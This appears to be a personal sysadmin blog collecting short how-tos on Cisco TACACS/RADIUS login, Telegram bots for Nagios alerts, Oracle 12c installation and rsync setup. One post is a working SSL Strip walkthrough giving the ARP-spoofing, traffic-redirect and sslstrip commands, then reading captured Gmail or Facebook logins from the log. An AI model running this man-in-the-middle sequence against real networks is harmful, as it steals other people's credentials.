Vannakk.net

Saturday, July 8, 2017

Configure Authentication With TACACS and Radius

Diagram

1. On PC

2. On Server TACACS+

3. On Server Radius

4. On Router, R1

configure terminal

hostname R1

interface GigabitEthernet0/0

ip address 192.168.2.1 255.255.255.0

no sh

interface GigabitEthernet0/1

ip address 192.168.1.1 255.255.255.0

no sh

ip domain-name cisco.com

username admin pass cisco

crypto key generate rsa

1024

enable secret cisco

line vty 0 4

transport input ssh

privilege level 15

aaa new-model

aaa authentication login AUTH group tacacs+ group radius local

tacacs-server host 192.168.1.2

tacacs-server key TACACS123

radius-server host 192.168.1.3

radius-server key RADIUS123

Wednesday, March 22, 2017

SSL Strip

Diagram:

On KALI Machine

* Open a Terminal
netdiscover

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

arpspoof -i eth0 -t 10.10.1.55 -r 10.10.1.111

* Open another Terminal
sslstrip -l 8080

Once the Victim Machine access to any login website such as, Facebook, Gmail, Yahoo, we will be able to see the login name and password that store on the file sslstrip.log on Kali.

* Open another Terminal
cat sslstrip.log to see the name and password.

Monday, February 20, 2017

Install NoMachine

Install NoMachine remote desktop to Kali.

1. On Window PC
Download and install NoMachine
https://www.nomachine.com/download/download&id=17

2. On KALI
Downlaod and install NoMachine
cd ~/Downloads
https://www.nomachine.com/download/download&id=3

dpkg -i nomachine_5.2.11_1_amd64.deb

3. Start NoMachine
Start NoMachine on Windows PC and connect to Kali

Wednesday, January 4, 2017

Create Telegram Bot

1. Search: BotFather (@BotFather)
/newbot

vnkk001_bot

After create the new bot we will got API similar the below format:
Use this token to access the HTTP API:
1122334455:AAbbCCddEEff1122334455

/setdescription

/setjointgroups

Check the API Info:
https://api.telegram.org/bot1122334455:AAbbCCddEEff1122334455/getme

Check the API Chat:
https://api.telegram.org/bot1122334455:AAbbCCddEEff1122334455/getupdates

Chat from Broswer:
https://api.telegram.org/bot1122334455:AAbbCCddEEff1122334455/sendmessage?chat_id=154066828&text=TestMSG001

Why need to have BOT?
You can create as many BOT as you want and make it work for you as our robot.

In my case I create one to alert me once something went wrong,
I integrated with Nagios with the bot API as mentions above.

1. Create new bot, I named it: Nagios_Alert

2. Add bot to a group (what ever you want and add other member as you want to)

3. Integrated with Nagios, by send the message as bot user to post the message,

So all the members will see the message in the group.

Monday, December 26, 2016

Install Oracle Database 12c on Oracle Linux 7

OS: Oracle Linux 7 - 64bits
Database: Oracle Database 12c

Let start install vim editor:

yum install vim -y

vim /etc/hosts
123.123.123.111 oraclesvr.localdomain oraclesvr

vim /etc/sysctl.conf

fs.file-max = 6815744
kernel.sem = 250 32000 100 128
kernel.shmmni = 4096
kernel.shmall = 1073741824
kernel.shmmax = 4398046511104
kernel.panic_on_oops = 1
net.core.rmem_default = 262144
net.core.rmem_max = 4194304
net.core.wmem_default = 262144
net.core.wmem_max = 1048576
net.ipv4.conf.all.rp_filter = 2
net.ipv4.conf.default.rp_filter = 2
fs.aio-max-nr = 1048576
net.ipv4.ip_local_port_range = 9000 65500

/sbin/sysctl -p

vim /etc/security/limits.conf
oracle soft nofile 1024
oracle hard nofile 65536
oracle soft nproc 16384
oracle hard nproc 16384
oracle soft stack 10240
oracle hard stack 32768
oracle hard memlock 134217728
oracle soft memlock 134217728

yum install binutils -y
yum install compat-libstdc++-33 -y
yum install compat-libstdc++-33.i686 -y
yum install gcc -y
yum install gcc-c++ -y
yum install glibc -y
yum install glibc.i686 -y
yum install glibc-devel -y
yum install glibc-devel.i686 -y
yum install ksh -y
yum install libgcc -y
yum install libgcc.i686 -y
yum install libstdc++ -y
yum install libstdc++.i686 -y
yum install libstdc++-devel -y
yum install libstdc++-devel.i686 -y
yum install libaio -y
yum install libaio.i686 -y
yum install libaio-devel -y
yum install libaio-devel.i686 -y
yum install libXext -y
yum install libXext.i686 -y
yum install libXtst -y
yum install libXtst.i686 -y
yum install libX11 -y
yum install libX11.i686 -y
yum install libXau -y
yum install libXau.i686 -y
yum install libxcb -y
yum install libxcb.i686 -y
yum install libXi -y
yum install libXi.i686 -y
yum install make -y
yum install sysstat -y
yum install unixODBC -y
yum install unixODBC-devel -y
yum install zlib-devel -y
yum install zlib-devel.i686 -y

groupadd -g 54321 oinstall
groupadd -g 54322 dba
groupadd -g 54323 oper
useradd -u 54321 -g oinstall -G dba,oper oracle

passwd oracle
*********

vim /etc/selinux/config
SELINUX=permissive

setenforce Permissive

systemctl stop firewalld
systemctl disable firewalld

mkdir -p /u01/app/oracle/product/12.1.0.2/db_1
mkdir /u01/setup
chown -R oracle:oinstall /u01
chmod -R 775 /u01

Copy database files to server: /u01/setup

Install VNC Server for user Oracle
yum groupinstall "X Window System" -y

yum install gnome-classic-session gnome-terminal nautilus-open-terminal control-center liberation-mono-fonts -y

unlink /etc/systemd/system/default.target
ln -sf /lib/systemd/system/graphical.target /etc/systemd/system/default.target

reboot

yum install tigervnc-server -y

cp /lib/systemd/system/vncserver@.service /etc/systemd/system/vncserver@:3.service

vim /etc/systemd/system/vncserver\@\:3.service
Edit as these lines:
ExecStart=/sbin/runuser -l oracle -c "/usr/bin/vncserver %i -geometry 640x480"
PIDFile=/home/oracle/.vnc/%H%i.pid

I am create for user oracle in this case,
Login as user oracle and issue the following command:
su - oracle
vncpasswd
Password: *********
Verify: *********

exit

Reload systemd for changes.
systemctl daemon-reload

Enable service at startup
systemctl enable vncserver@:3.service

Start the service .
systemctl start vncserver@:3.service

Start the VNC viewer and connect to server with user Oracle,
Start a terminal and issue the following command to install Oracle
cd /u01/setup
extract database files:
unzip linuxamd64_12102_database_se2_1of2.zip
unzip linuxamd64_12102_database_se2_2of2.zip

After Extract there is be have a folder name : database
go to that folder:
cd /u01/setup/database

And run the script install:
./runInstaller

Let login: https://123.123.123.111:5500/em

Done,

Friday, November 25, 2016

RSYNC With Username and Password

On Server2:

In this example we have user2 and password: PaSSWDUser2

yum install rsync

mkdir /home/user2/dir-server2

vi /home/user2/.rsyncd.secrets

user2:PaSSWDUser2

chmod 600 /home/user2/.rsyncd.secrets

vim /etc/rsyncd.conf

With content:

use chroot = false
lock file = /var/log/rsync.lock
log file = /var/log/rsyncd.log
pid file = /var/log/rsyncd.pid
[dir-server2]
        path=/home/user2/dir-server2/
        comment = Directory on Server2
        uid = root
        gid = root
        read only = no
        list = yes
        auth users = user2
        secrets file = /home/user2/.rsyncd.secrets
        max connections = 10

hosts allow = 123.123.123.101

service iptables stop

rsync --daemon

On Server1:

In this example, we have user1 on server1 with password: PaSSWDUser1

Create a file name and store only the password of user2

vi /home/user1/.rsync.secrets

With content:

PaSSWDUser2

chmod 600 /home/user1/.rsync.secrets

chown user1:user1 /home/user1/.rsync.secrets

rsync -avz --password-file=/home/user1/.rsync.secrets /home/user1/dir-server1/ user2@123.123.123.102::dir-server2

Pages